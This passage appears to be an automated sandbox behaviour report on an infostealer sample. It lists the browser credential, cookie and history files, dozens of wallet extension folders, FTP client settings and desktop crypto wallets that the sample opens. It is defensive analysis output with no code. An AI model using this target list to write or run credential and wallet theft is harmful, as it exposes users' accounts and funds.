Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BXAJUJAOEO	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BXAJUJAOEO	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BXAJUJAOEO	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BXAJUJAOEO	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BXAJUJAOEO	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BXAJUJAOEO	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BXAJUJAOEO	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BXAJUJAOEO	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BXAJUJAOEO	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BXAJUJAOEO	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BXAJUJAOEO	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BXAJUJAOEO	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI	Jump to behavior
